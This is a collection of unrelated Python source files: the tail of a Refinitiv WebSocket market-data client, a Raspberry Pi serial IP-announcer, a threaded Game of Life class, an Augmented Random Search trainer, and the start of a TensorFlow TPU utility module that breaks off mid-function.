self._process_login_response(message_json)
elif message_type == "Ping":
pong_json = {'Type': 'Pong'}
self.web_socket_app.send(json.dumps(pong_json))
print("SENT on " + self.session_name + ":")
print(json.dumps(pong_json, sort_keys=True, indent=2, separators=(',', ':')))
# Callback events from WebSocketApp
def _on_message(self, ws, message):
""" Called when message received, parse message into JSON for processing """
print("RECEIVED on " + self.session_name + ":")
message_json = json.loads(message)
print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))
for singleMsg in message_json:
self._process_message(singleMsg)
def _on_error(self, ws, error):
""" Called when websocket error has occurred """
print("Session: " + str(self.session_name) + "; Error: "+ str(error))
def _on_close(self, ws, close_status_code, close_msg):
""" Called when websocket is closed """
self.web_socket_open = False
self.logged_in = False
print("WebSocket Closed for " + self.session_name)
if not self.disconnected_by_user:
print("Reconnect to the endpoint for " + self.session_name + " after 3 seconds... ")
time.sleep(3)
self.connect()
def _on_open(self, ws):
""" Called when handshake is complete and websocket is open, send login """
print("WebSocket successfully connected for " + self.session_name + "!")
self.web_socket_open = True
self._send_login_request(sts_token, False)
# Operations
def connect(self):
# Start websocket handshake
ws_address = "wss://{}/WebSocket".format(self.host)
print("Connecting to WebSocket " + ws_address + " for " + self.session_name + "...")
self.web_socket_app = websocket.WebSocketApp(ws_address,
on_message=self._on_message,
on_error=self._on_error,
on_close=self._on_close,
on_open=self._on_open,
subprotocols=['tr_json2'])
# Event loop
wst = threading.Thread(target=self.web_socket_app.run_forever, kwargs={'sslopt': {'check_hostname': False}})
wst.start()
def disconnect(self):
print("Closing the WebSocket connection for " + self.session_name)
self.disconnected_by_user = True
if self.web_socket_open:
self.web_socket_app.close()
def refresh_token(self):
if self.logged_in:
print("Refreshing the access token for " + self.session_name)
self._send_login_request(sts_token, True)
def query_service_discovery(url=None):
if url is None:
url = discovery_url
print("Sending Refinitiv Data Platform service discovery request to " + url)
try:
r = requests.get(url, headers={"Authorization": "Bearer " + sts_token}, params={"transport": "websocket"}, allow_redirects=False)
except requests.exceptions.RequestException as e:
print('Refinitiv Data Platform service discovery exception failure:', e)
return False
if r.status_code == 200:
# Authentication was successful. Deserialize the response.
response_json = r.json()
print("Refinitiv Data Platform Service discovery succeeded. RECEIVED:")
print(json.dumps(response_json, sort_keys=True, indent=2, separators=(',', ':')))
for index in range(len(response_json['services'])):
if not response_json['services'][index]['location'][0].startswith(region):
continue
if not hotstandby:
if len(response_json['services'][index]['location']) == 2:
hostList.append(response_json['services'][index]['endpoint'] + ":" +
str(response_json['services'][index]['port']))
break
else:
if len(response_json['services'][index]['location']) == 1:
hostList.append(response_json['services'][index]['endpoint'] + ":" +
str(response_json['services'][index]['port']))
if hotstandby:
if len(hostList) < 2:
print("Expected 2 hosts but received:", len(hostList), "or the region:", region, "is not present in list of endpoints")
sys.exit(1)
else:
if len(hostList) == 0:
print("The region:", region, "is not present in list of endpoints")
sys.exit(1)
return True
elif r.status_code in [ 301, 302, 307, 308 ]:
# Perform URL redirect
print('Refinitiv Data Platform service discovery HTTP code:', r.status_code, r.reason)
new_host = r.headers['Location']
if new_host is not None:
print('Perform URL redirect to ', new_host)
return query_service_discovery(new_host)
return False
elif r.status_code in [ 403, 404, 410, 451 ]:
# Stop trying with the request
print('Refinitiv Data Platform service discovery HTTP code:', r.status_code, r.reason)
print('Stop trying with the request')
return False
else:
# Retry the service discovery request
print('Refinitiv Data Platform service discovery HTTP code:', r.status_code, r.reason)
time.sleep(5)
# CAUTION: This is sample code with infinite retries.
print('Retry the service discovery request')
return query_service_discovery()
def get_sts_token(current_refresh_token, url=None):
"""
Retrieves an authentication token.
:param current_refresh_token: Refresh token retrieved from a previous authentication, used to retrieve a
subsequent access token. If not provided (i.e. on the initial authentication), the password is used.
"""
if url is None:
url = auth_url
if not current_refresh_token: # First time through, send password
data = {'username': user, 'password': password, 'client_id': clientid, 'grant_type': 'password', 'takeExclusiveSignOnControl': True,
'scope': scope}
print("Sending authentication request with password to", url, "...")
else: # Use the given refresh token
data = {'username': user, 'client_id': clientid, 'refresh_token': current_refresh_token, 'grant_type': 'refresh_token'}
print("Sending authentication request with refresh token to", url, "...")
if client_secret != '':
data['client_secret'] = client_secret;
try:
# Request with auth for https protocol
r = requests.post(url,
headers={'Accept': 'application/json'},
data=data,
auth=(clientid, client_secret),
verify=True,
allow_redirects=False)
except requests.exceptions.RequestException as e:
print('Refinitiv Data Platform authentication exception failure:', e)
return None, None, None
if r.status_code == 200:
auth_json = r.json()
print("Refinitiv Data Platform Authentication succeeded. RECEIVED:")
print(json.dumps(auth_json, sort_keys=True, indent=2, separators=(',', ':')))
return auth_json['access_token'], auth_json['refresh_token'], auth_json['expires_in']
elif r.status_code in [ 301, 302, 307, 308 ]:
# Perform URL redirect
print('Refinitiv Data Platform authentication HTTP code:', r.status_code, r.reason)
new_host = r.headers['Location']
if new_host is not None:
print('Perform URL redirect to ', new_host)
return get_sts_token(current_refresh_token, new_host)
return None, None, None
elif r.status_code in [ 400, 401 ]:
# Retry with username and password
print('Refinitiv Data Platform authentication HTTP code:', r.status_code, r.reason)
if current_refresh_token:
# Refresh token may have expired. Try using our password.
print('Retry with username and password')
return get_sts_token(None)
return None, None, None
elif r.status_code in [ 403, 404, 410, 451 ]:
# Stop retrying with the request
print('Refinitiv Data Platform authentication HTTP code:', r.status_code, r.reason)
print('Stop retrying with the request')
return None, None, None
else:
# Retry the request to Refinitiv Data Platform
print('Refinitiv Data Platform authentication HTTP code:', r.status_code, r.reason)
time.sleep(5)
# CAUTION: This is sample code with infinite retries.
print('Retrying auth request to Refinitiv Data Platform')
return get_sts_token(current_refresh_token)
def print_commandline_usage_and_exit(exit_code):
print('Usage: market_price_rdpgw_service_discovery.py [--app_id app_id] '
'[--user user] [--clientid clientid] [--password password] [--newPassword new_password] [--position position] [--auth_url auth_url] '
'[--discovery_url discovery_url] [--scope scope] [--service service] [--region region] [--ric ric] [--hotstandby] [--help]')
sys.exit(exit_code)
def check_new_password(pwd):
result = 0;
countUpper = 0;
countLower = 0;
countDigit = 0;
countSpecial = 0;
if len(pwd) < PASSWORD_LENGTH_MIN :
result |= PASSWORD_LENGTH_MASK;
for c in pwd :
# This long condition is used in order not to import re library
# If re will be imported for some other purpose this condition should be
# refactored using regular expression
if not ((c >= 'A' and c <= 'Z') or (c >= 'a' and c <= 'z') \
or (c >= '0' and c <= '9') or (c in PASSWORD_SPECIAL_CHARACTER_SET)) :
result |= PASSWORD_INVALID_CHARACTER_MASK;
if (c >= 'A' and c <= 'Z') :
countUpper += 1;
if (c >= 'a' and c <= 'z') :
countLower += 1;
if (c >= '0' and c <= '9') :
countDigit += 1;
if (c in PASSWORD_SPECIAL_CHARACTER_SET) :
countSpecial += 1;
if (countUpper < PASSWORD_UPPERCASE_LETTER_MIN) :
result |= PASSWORD_UPPERCASE_LETTER_MASK;
if (countLower < PASSWORD_LOWERCASE_LETTER_MIN) :
result |= PASSWORD_LOWERCASE_LETTER_MASK;
if (countDigit < PASSWORD_DIGIT_MIN) :
result |= PASSWORD_DIGIT_MASK;
if (countSpecial < PASSWORD_SPECIAL_CHARACTER_MIN) :
result |= PASSWORD_SPECIAL_CHARACTER_MASK;
return result
def changePassword():
data = {'username': user, 'password': password, 'client_id': clientid, 'grant_type': 'password', 'takeExclusiveSignOnControl': True,
'scope': scope, 'newPassword' : newPassword}
print("Sending changing password request to", auth_url, "...")
try:
# Request with auth for https protocol
r = requests.post(auth_url,
headers={'Accept': 'application/json'},
data=data,
auth=(clientid, client_secret),
verify=True,
allow_redirects=False)
except requests.exceptions.RequestException as e:
print('Changing password exception failure:', e)
return False
if r.status_code == 200:
auth_json = r.json()
print("Password successfully changed.")
print(json.dumps(auth_json, sort_keys=True, indent=2, separators=(',', ':')))
return True
elif r.status_code in [ 301, 302, 307, 308 ]:
# Perform URL redirect
print('Changing password response HTTP code:', r.status_code, r.reason)
new_host = r.headers['Location']
if new_host is not None:
print('Perform URL redirect to ', new_host)
return changePassword()
return False
elif r.status_code in [ 400, 401, 403, 404, 410, 451 ]:
# Error during change password attempt
auth_json = r.json()
print('Changing password response HTTP code:', r.status_code, r.reason)
print(json.dumps(auth_json, sort_keys=True, indent=2, separators=(',', ':')))
return False
else:
# Retry the request to the API gateway
print('Changing password response HTTP code:', r.status_code, r.reason)
time.sleep(5)
# CAUTION: This is sample code with infinite retries.
print('Retry change request')
return changePassword()
if __name__ == "__main__":
# Get command line parameters
opts = []
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["help", "app_id=", "user=", "clientid=", "password=", "newPassword=",
"position=", "auth_url=", "discovery_url=", "scope=", "service=", "region=", "ric=",
"hotstandby"])
except getopt.GetoptError:
print_commandline_usage_and_exit(2)
for opt, arg in opts:
if opt in "--help":
print_commandline_usage_and_exit(0)
elif opt in "--app_id":
app_id = arg
elif opt in "--user":
user = arg
elif opt in "--clientid":
clientid = arg
elif opt in "--password":
password = arg
elif opt in "--newPassword":
newPassword = arg
elif opt in "--position":
position = arg
elif opt in "--auth_url":
auth_url = arg
elif opt in "--discovery_url":
discovery_url = arg
elif opt in "--scope":
scope = arg
elif opt in "--service":
service = arg
elif opt in "--region":
region = arg
elif opt in "--ric":
ric = arg
elif opt in "--hotstandby":
hotstandby = True
if user == '' or password == '' or clientid == '':
print("user, clientid and password are required options")
sys.exit(2)
if (newPassword != '') :
policyResult = check_new_password(newPassword);
if (policyResult & PASSWORD_INVALID_CHARACTER_MASK != 0) :
print("New password contains invalid symbol");
print("valid symbols are [A-Z][a-z][0-9]", PASSWORD_SPECIAL_CHARACTER_SET, sep = '');
sys.exit(2);
if (policyResult & PASSWORD_LENGTH_MASK != 0) :
print("New password length should be at least ", PASSWORD_LENGTH_MIN, " characters");
sys.exit(2);
countCategories = 0;
if (policyResult & PASSWORD_UPPERCASE_LETTER_MASK == 0) :
countCategories += 1;
if (policyResult & PASSWORD_LOWERCASE_LETTER_MASK == 0) :
countCategories += 1;
if (policyResult & PASSWORD_DIGIT_MASK == 0) :
countCategories += 1;
if (policyResult & PASSWORD_SPECIAL_CHARACTER_MASK == 0) :
countCategories += 1;
if (countCategories < PASSWORD_MIN_NUMBER_OF_CATEGORIES) :
print ("Password must contain characters belonging to at least three of the following four categories:\n"
"uppercase letters, lowercase letters, digits, and special characters.\n");
sys.exit(2);
if (not changePassword()):
sys.exit(2);
password = newPassword;
newPassword = '';
if position == '':
# Populate position if possible
try:
position_host = socket.gethostname()
position = socket.gethostbyname(position_host) + "/" + position_host
except socket.gaierror:
position = "127.0.0.1/net"
sts_token, refresh_token, expire_time = get_sts_token(None)
if not sts_token:
sys.exit(1)
original_expire_time = expire_time
# Query VIPs from Refinitiv Data Platform service discovery
if not query_service_discovery():
print("Failed to retrieve endpoints from Refinitiv Data Platform Service Discovery. Exiting...")
sys.exit(1)
# Start websocket handshake; create two sessions when the hotstandby parameter is specified.
session1 = WebSocketSession("session1", hostList[0])
session1.connect()
if hotstandby:
session2 = WebSocketSession("session2", hostList[1])
session2.connect()
try:
while True:
# Continue using current token until 90% of initial time before it expires.
time.sleep(int(float(expire_time) * 0.90))
sts_token, refresh_token, expire_time = get_sts_token(refresh_token)
if not sts_token:
sys.exit(1)
if int(expire_time) != int(original_expire_time):
print('expire time changed from ' + str(original_expire_time) + ' sec to ' + str(expire_time) + ' sec; retry with password')
sts_token, refresh_token, expire_time = get_sts_token(None)
if not sts_token:
sys.exit(1)
original_expire_time = expire_time
# Update token.
session1.refresh_token()
if hotstandby:
session2.refresh_token()
except KeyboardInterrupt:
session1.disconnect()
if hotstandby:
session2.disconnect()
|
app.py
|
#!/usr/bin/env python
import socket
import serial
import sys,time
import signal
from time import ctime,sleep
import glob,struct
from multiprocessing import Process,Manager,Array
import threading
def get_my_ip():
try:
csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
csock.connect(('8.8.8.8', 80))
(addr, port) = csock.getsockname()
csock.close()
return addr
except socket.error:
return "127.0.0.1"
def onRead():
global ser,isExit
while True:
if isExit:
break;
n = ser.inWaiting()
if n>0 :
s = ser.read(n)
if s.find("M5 OK")>-1:
ser.write("M5 SIP:"+get_my_ip()+":5000\n")
if __name__ == "__main__":
print get_my_ip()
ser = serial.Serial("/dev/ttyAMA0",115200)
isExit = False
try:
th = threading.Thread(target=onRead)
th.start()
while True:
sleep(1)
except KeyboardInterrupt:
print "exit"
isExit = True
finally:
ser.close();
|
threaded_game.py
|
"""Threaded Game module for py-conway.
This module contains the core functionality for running Conway's Game
of Life on a background thread. Unlike the main game, which must be
advanced manually, a threaded game will run automatically until
stopped.
"""
from . import Game, GameState
from threading import Thread
class ThreadedGame(Game):
"""Threaded module class.
Class for running a game of Conway's Game of Life on a virtual
two-dimensional board of any size on a background thread.
"""
def __init__(self, width: int = 0, height: int = 0,
seed: list = None, random: bool = False,
enforce_boundary: bool = True):
"""
Intialize the game based on provided board size values and a seed.
Args:
width (int): the width (in columns) of the game board
height (int): the height (in rows) of the game board
seed (int): A two-dimensional list with 1 and 0 values that
should be set to the initial game state.
random (bool): Boolean indicating whether a random seed should
be created. Ignored if a seed is provided.
enforce_boundary (bool): Boolean indicating whether cells on
the edge of the board should wrap around to the other
side.
"""
self._thread_active = False
super().__init__(width, height, seed, random, enforce_boundary)
def _run(self):
"""Target method for running a game on a thread."""
if self.state == GameState.READY:
self.state = GameState.RUNNING
while True:
if (self.live_cells == 0 or not self._thread_active):
self.state = GameState.FINISHED
break
self.run_generation()
def start_thread(self):
"""Run the game automatically on a background thread."""
thread = Thread(target=self._run, args=())
thread.daemon = True
self._thread_active = True
thread.start()
def stop_thread(self):
"""Stop a game currently running on a background thread."""
self._thread_active = False
|
ars.py
|
# AI 2018
import os
import inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0,parentdir)
# Importing the libraries
import os
import numpy as np
import gym
from gym import wrappers
import pybullet_envs
import time
import multiprocessing as mp
from multiprocessing import Process, Pipe
import argparse
# Setting the Hyper Parameters
class Hp():
def __init__(self):
self.nb_steps = 10000
self.episode_length = 1000
self.learning_rate = 0.02
self.nb_directions = 16
self.nb_best_directions = 16
assert self.nb_best_directions <= self.nb_directions
self.noise = 0.03
self.seed = 1
self.env_name = 'HalfCheetahBulletEnv-v0'
# Multiprocess Exploring the policy on one specific direction and over one episode
_RESET = 1
_CLOSE = 2
_EXPLORE = 3
def ExploreWorker(rank,childPipe, envname, args):
env = gym.make(envname)
nb_inputs = env.observation_space.shape[0]
normalizer = Normalizer(nb_inputs)
observation_n = env.reset()
n=0
while True:
n+=1
try:
# Only block for short times to have keyboard exceptions be raised.
if not childPipe.poll(0.001):
continue
message, payload = childPipe.recv()
except (EOFError, KeyboardInterrupt):
break
if message == _RESET:
observation_n = env.reset()
childPipe.send(["reset ok"])
continue
if message == _EXPLORE:
#normalizer = payload[0] #use our local normalizer
policy = payload[1]
hp = payload[2]
direction = payload[3]
delta = payload[4]
state = env.reset()
done = False
num_plays = 0.
sum_rewards = 0
while not done and num_plays < hp.episode_length:
normalizer.observe(state)
state = normalizer.normalize(state)
action = policy.evaluate(state, delta, direction,hp)
state, reward, done, _ = env.step(action)
reward = max(min(reward, 1), -1)
sum_rewards += reward
num_plays += 1
childPipe.send([sum_rewards])
continue
if message == _CLOSE:
childPipe.send(["close ok"])
break
childPipe.close()
# Normalizing the states
class Normalizer():
def __init__(self, nb_inputs):
self.n = np.zeros(nb_inputs)
self.mean = np.zeros(nb_inputs)
self.mean_diff = np.zeros(nb_inputs)
self.var = np.zeros(nb_inputs)
def observe(self, x):
self.n += 1.
last_mean = self.mean.copy()
self.mean += (x - self.mean) / self.n
self.mean_diff += (x - last_mean) * (x - self.mean)
self.var = (self.mean_diff / self.n).clip(min = 1e-2)
def normalize(self, inputs):
obs_mean = self.mean
obs_std = np.sqrt(self.var)
return (inputs - obs_mean) / obs_std
# Building the AI
class Policy():
def __init__(self, input_size, output_size, env_name, args):
try:
self.theta = np.load(args.policy)
except:
self.theta = np.zeros((output_size, input_size))
self.env_name = env_name
print("Starting policy theta=",self.theta)
def evaluate(self, input, delta, direction, hp):
if direction is None:
return np.clip(self.theta.dot(input), -1.0, 1.0)
elif direction == "positive":
return np.clip((self.theta + hp.noise*delta).dot(input), -1.0, 1.0)
else:
return np.clip((self.theta - hp.noise*delta).dot(input), -1.0, 1.0)
def sample_deltas(self):
return [np.random.randn(*self.theta.shape) for _ in range(hp.nb_directions)]
def update(self, rollouts, sigma_r, args):
step = np.zeros(self.theta.shape)
for r_pos, r_neg, d in rollouts:
step += (r_pos - r_neg) * d
self.theta += hp.learning_rate / (hp.nb_best_directions * sigma_r) * step
timestr = time.strftime("%Y%m%d-%H%M%S")
np.save(args.logdir+"/policy_"+self.env_name+"_"+timestr+".npy", self.theta)
# Exploring the policy on one specific direction and over one episode
def explore(env, normalizer, policy, direction, delta, hp):
state = env.reset()
done = False
num_plays = 0.
sum_rewards = 0
while not done and num_plays < hp.episode_length:
normalizer.observe(state)
state = normalizer.normalize(state)
action = policy.evaluate(state, delta, direction, hp)
state, reward, done, _ = env.step(action)
reward = max(min(reward, 1), -1)
sum_rewards += reward
num_plays += 1
return sum_rewards
# Training the AI
def train(env, policy, normalizer, hp, parentPipes, args):
for step in range(hp.nb_steps):
# Initializing the perturbations deltas and the positive/negative rewards
deltas = policy.sample_deltas()
positive_rewards = [0] * hp.nb_directions
negative_rewards = [0] * hp.nb_directions
if parentPipes:
for k in range(hp.nb_directions):
parentPipe = parentPipes[k]
parentPipe.send([_EXPLORE,[normalizer, policy, hp, "positive", deltas[k]]])
for k in range(hp.nb_directions):
positive_rewards[k] = parentPipes[k].recv()[0]
for k in range(hp.nb_directions):
parentPipe = parentPipes[k]
parentPipe.send([_EXPLORE,[normalizer, policy, hp, "negative", deltas[k]]])
for k in range(hp.nb_directions):
negative_rewards[k] = parentPipes[k].recv()[0]
else:
# Getting the positive rewards in the positive directions
for k in range(hp.nb_directions):
positive_rewards[k] = explore(env, normalizer, policy, "positive", deltas[k], hp)
# Getting the negative rewards in the negative/opposite directions
for k in range(hp.nb_directions):
negative_rewards[k] = explore(env, normalizer, policy, "negative", deltas[k], hp)
# Gathering all the positive/negative rewards to compute the standard deviation of these rewards
all_rewards = np.array(positive_rewards + negative_rewards)
sigma_r = all_rewards.std()
# Sorting the rollouts by the max(r_pos, r_neg) and selecting the best directions
scores = {k:max(r_pos, r_neg) for k,(r_pos,r_neg) in enumerate(zip(positive_rewards, negative_rewards))}
order = sorted(scores.keys(), key = lambda x:scores[x])[:hp.nb_best_directions]
rollouts = [(positive_rewards[k], negative_rewards[k], deltas[k]) for k in order]
# Updating our policy
policy.update(rollouts, sigma_r, args)
# Printing the final reward of the policy after the update
reward_evaluation = explore(env, normalizer, policy, None, None, hp)
print('Step:', step, 'Reward:', reward_evaluation)
# Running the main code
def mkdir(base, name):
path = os.path.join(base, name)
if not os.path.exists(path):
os.makedirs(path)
return path
if __name__ == "__main__":
mp.freeze_support()
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--env', help='Gym environment name', type=str, default='HalfCheetahBulletEnv-v0')
parser.add_argument('--seed', help='RNG seed', type=int, default=1)
parser.add_argument('--render', help='OpenGL Visualizer', type=int, default=0)
parser.add_argument('--movie',help='rgb_array gym movie',type=int, default=0)
parser.add_argument('--steps', help='Number of steps', type=int, default=10000)
parser.add_argument('--policy', help='Starting policy file (npy)', type=str, default='')
parser.add_argument('--logdir', help='Directory root to log policy files (npy)', type=str, default='.')
parser.add_argument('--mp', help='Enable multiprocessing', type=int, default=1)
args = parser.parse_args()
hp = Hp()
hp.env_name = args.env
hp.seed = args.seed
hp.nb_steps = args.steps
print("seed = ", hp.seed)
np.random.seed(hp.seed)
parentPipes = None
if args.mp:
num_processes = hp.nb_directions
processes = []
childPipes = []
parentPipes = []
for pr in range (num_processes):
parentPipe, childPipe = Pipe()
parentPipes.append(parentPipe)
childPipes.append(childPipe)
for rank in range(num_processes):
p = mp.Process(target=ExploreWorker, args=(rank,childPipes[rank], hp.env_name, args))
p.start()
processes.append(p)
work_dir = mkdir('exp', 'brs')
monitor_dir = mkdir(work_dir, 'monitor')
env = gym.make(hp.env_name)
if args.render:
env.render(mode = "human")
if args.movie:
env = wrappers.Monitor(env, monitor_dir, force = True)
nb_inputs = env.observation_space.shape[0]
nb_outputs = env.action_space.shape[0]
policy = Policy(nb_inputs, nb_outputs,hp.env_name, args)
normalizer = Normalizer(nb_inputs)
print("start training")
train(env, policy, normalizer, hp, parentPipes, args)
if args.mp:
for parentPipe in parentPipes:
parentPipe.send([_CLOSE,"pay2"])
for p in processes:
p.join()
|
tflex.py
|
import tensorflow as tf
import numpy as np
from glob import glob
import os
import re
from tensorflow.python import pywrap_tensorflow
import tqdm
import h5py
import shutil
import tempfile
import traceback
import time
import threading
from tensorflow.python.framework import dtypes
from tensorflow.python.distribute.cluster_resolver import TPUClusterResolver as BaseTPUClusterResolver
from tensorflow.python.training import server_lib
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.contrib import tpu
class _DefaultState(threading.local):
def __init__(self, **kws):
super(_DefaultState, self).__init__()
for k, v in kws.items():
setattr(self, k, v)
def save(self):
return [(k, v) for k, v in self.__dict__.items()]
def restore(self, state):
for k, v in state:
setattr(self, k, v)
local = _DefaultState()
lock = threading.RLock()
def with_defaults(thunk):
with lock:
state = local.save()
session = tf.get_default_session() or get_default_session()
graph = tf.get_default_graph() or get_default_graph()
def f(*args, **kws):
with lock:
local.restore(state)
lock.acquire()
with session.as_default() if session else nullcontext():
with graph.as_default() if graph else nullcontext():
lock.release()
result = thunk(*args, **kws)
lock.acquire()
lock.release()
return result
return f
def get_default(name, required=True):
with lock:
value = getattr(local, name) if hasattr(local, name) else None
if required:
assert value is not None
return value
def set_default(name, value):
with lock:
setattr(local, name, value)
def ensure_default(name, value):
with lock:
current = get_default(name, required=False)
if current is None:
set_default(name, value)
return value
def get_default_session(required=False):
return get_default('session', required=required)
def get_default_graph(required=False):
return get_default('graph', required=required)
class Future(object):
def __init__(self, dependencies, thunk, *args, **kws):
if isinstance(dependencies, Future):
dependencies = [dependencies]
self.dependencies = [defer(_) if callable(_) else _ for _ in dependencies]
if thunk is None:
thunk = lambda: None
self.thunk = thunk
self.args = args
self.kws = kws
self.result = None
self.complete = False
self.thread = None
self.daemon = True
self.error = None
def run(self):
try:
self.result = self.thunk(*self.args, **self.kws)
except Exception as e:
traceback.print_exc()
self.error = e
self.complete = True
def run_async(self):
assert self.thread is None
def thunk():
[_.join() for _ in self.dependencies]
self.run()
self.thread = threading.Thread(target=with_defaults(thunk), daemon=self.daemon)
self.thread.start()
def join(self):
if not self.complete:
assert self.thread
while not self.complete:
time.sleep(1.0)
return self.result
def defer(thunk, *args, **kws):
dependencies = []
if 'dependencies' in kws:
dependencies = kws.pop('dependencies')
future = Future(dependencies=dependencies, thunk=thunk, *args, **kws)
future.run_async()
return future
def parallelize(xs, thunk, *args, daemon=True):
threads = []
for x in xs:
thread = threading.Thread(target=with_defaults(thunk), args=(x, *args), daemon=daemon)
thread.start()
threads.append(thread)
return threads
def parallelize_verbose(label, xs, thunk, *args, daemon=True):
xs = [x for x in xs]
with tqdm.tqdm(total=len(xs)) as pbar:
pbar.set_description(label)
def run(*args, **kws):
try:
return thunk(*args, **kws)
finally:
pbar.update(1)
return parallelize(xs, run, *args, daemon=daemon)
def parallelize_verbose(label, xs, thunk, *args, daemon=True, synchronous=False):
xs = [x for x in xs]
if synchronous:
for i in tqdm.trange(len(xs), desc=label):
x = xs[i]
thunk(x, *args)
else:
with tqdm.tqdm(total=len(xs)) as pbar:
pbar.set_description(label)
threads = parallelize(xs, thunk, *args, daemon=daemon)
while len(threads) > 0:
for i in range(len(threads)):
if not threads[i].is_alive():
pbar.update(1)
threads.remove(threads[i])
break
time.sleep(0.1)
# http://stackoverflow.com/questions/1624883/alternative-way-to-split-a-list-into-groups-of-n
import itertools
def group(n, iterable, fillvalue=None):
"group(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
args = [iter(iterable)] * n
return itertools.zip_longest(*args, fillvalue=fillvalue)
def tuples(*args, **kws):
return [x for x in group(*args, **kws)]
class Namespace(object):
pass
if 'state' not in globals():
state = Namespace()
if not hasattr(state, 'noisy'):
state.noisy = 'NOISY' in os.environ
if not hasattr(state, 'debug'):
state.debug = 'DEBUG' in os.environ
if not hasattr(state, 'noisy_backtrace'):
state.noisy_backtrace = 'NOISY_BACKTRACE' in os.environ
if not hasattr(state, 'break_next_run'):
state.break_next_run = False
def reroute(addr, host=None):
if host is None or host is False:
return addr
if addr.startswith('grpc://'):
return 'grpc://' + reroute(addr[len('grpc://'):], host=host)
if not re.match('[0-9]+[.][0-9]+[.][0-9]+[.][0-9]+[:]8470', addr):
return addr
if not addr.endswith(':8470'):
return addr
a, b, c, d = [int(x) for x in addr.split(':')[0].split('.')]
if a == 10 and b in [48, 49]:
assert (d == 2)
port = b * 1000 + c
elif a == 10 and b in range(2, 66) and c == 0:
port = b * 1000 + d
else:
return addr
return host + ':' + str(port)
class TPUClusterResolver(BaseTPUClusterResolver):
def __init__(self, *args, host=None, **kws):
super(TPUClusterResolver, self).__init__(*args, **kws)
if host is None:
if 'TPU_HOST' in os.environ:
host = os.environ['TPU_HOST']
self._host = host
def master(self, *args, **kws):
ip = super(TPUClusterResolver, self).master(*args, **kws)
return reroute(ip, host=self._host)
def cluster_spec(self):
spec = super(TPUClusterResolver, self).cluster_spec()
r = dict()
for k, v in spec.as_dict().items():
r[k] = [reroute(ip, host=self._host) for ip in v]
return server_lib.ClusterSpec(r)
def init_tpu(name, host=None, timeout_in_ms=600 * 60 * 1000):
tpu_init = [tpu.initialize_system()]
cluster_resolver = TPUClusterResolver(name, host=host)
config = tf.ConfigProto(operation_timeout_in_ms=timeout_in_ms,
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True)),
isolate_session_state=True)
cluster_spec = cluster_resolver.cluster_spec()
if cluster_spec:
config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
init_sess = tf.Session(cluster_resolver.get_master(), config=config)
init_sess.run(tpu_init)
return init_sess, cluster_resolver
def get_session(session=None):
if session is None:
session = get_default_session()
return session
def get_devices(session=None):
session = get_session(session)
if hasattr(session, '_cached_devices'):
devices = session._cached_devices
else:
devices = session._cached_devices = session.list_devices()
return devices
def has_gpu(session=None):
session = get_session(session)
if hasattr(session, '_has_gpu'):
result = session._has_gpu
else:
devices = get_devices(session=session)
result = session._has_gpu = len([x for x in devices if ':GPU:' in x.name]) > 0
return result
def has_tpu(session=None):
session = get_session(session)
if hasattr(session, '_has_tpu'):
result = session._has_tpu
else:
devices = get_devices(session=session)
result = session._has_tpu = len([x for x in devices if ':TPU:' in x.name]) > 0
return result
def get_cores_from_devices(devices):
cores = [x for x in devices if ':TPU:' in x.name]
if len(cores) <= 0:
cores = [x for x in devices if ':GPU:' in x.name]
if len(cores) <= 0:
cores = [x for x in devices if ':CPU:' in x.name]
return cores
def get_cores(session=None, devices=None):
if devices is None:
devices = get_devices(session=session)
return get_cores_from_devices(devices)
def get_cpus(session=None, devices=None):
if devices is None:
devices = get_devices(session=session)
cpus = [x for x in devices if ':CPU:' in x.name]
return cpus
def get_tpu_resolver(tpu_name='auto'):
# Get the TPU's location
if tpu_name != 'auto':
return TPUClusterResolver(tpu_name)
elif 'COLAB_TPU_ADDR' in os.environ:
return TPUClusterResolver()
elif 'TPU_NAME' in os.environ:
return TPUClusterResolver(os.environ['TPU_NAME'])
def pretty(x, ellipsize=120):
r = str(x)
if len(r) > ellipsize:
return r[0:ellipsize - 3] + '...'
return r
def print_backtrace():
try:
raise Exception("Printing traceback...")
except:
import traceback
traceback.print_exc()
class Session(tf.Session):
def __init__(self, target='auto', graph=None, config=None, init_tpu=False, id=None):
if config is None:
config = tf.ConfigProto(operation_timeout_in_ms=6000 * 60 * 1000,
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True)),
isolate_session_state=True)
config.isolate_session_state = True
resolver = get_tpu_resolver(target)
if resolver is not None:
target = resolver.get_master()
cluster_spec = resolver.cluster_spec()
if cluster_spec:
config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
elif target == 'auto':
target = None
super().__init__(target, graph=graph, config=config)
self.id = id
self._tflex_resolver = resolver
self._tflex_target = target
self._tflex_config = config
ensure_default('session', self)
ensure_default('devices', self.list_devices())
ensure_default('graph', self.graph)
@property
def _spec(self):
return '#%d' % self.id if self.id is not None else ''
def ensure(self):
if self.init_tpu:
print(self._spec, "Initializing TPU...")
#sess.run(tpu.initialize_system())
init_tpu(session=self, timeout_in_ms=20000)
self.init_tpu = None
def run(self, *args, **kws):
if state.break_next_run:
import pdb; pdb.set_trace()
if state.debug:
check_commands()
if state.noisy:
print(self._spec, 'Session.run', *[pretty(x) for x in args], *[pretty(k)+'='+pretty(v) for k, v in kws.items()])
if state.noisy_backtrace:
print_backtrace()
start = time.time()
result = super(Session, self).run(*args, **kws)
elapsed = time.time() - start
if state.noisy:
print(self._spec, 'Session.run (finished in %.2fs)' % elapsed, pretty(result), *[pretty(x) for x in args], *[pretty(k)+'='+pretty(v) for k, v in kws.items()])
if state.noisy_backtrace:
print_backtrace()
return result
def split_by_params(vs, n=20e6, f=None):
if f is None:
f = lambda x: np.prod(x.shape.as_list())
i = 0
xs = []
for variable in vs:
xs.append(variable)
count = f(variable)
i += count
if i >= n:
yield xs
xs = []
i = 0
yield xs
def latest_checkpoint(checkpoint_dir, latest_filename=None):
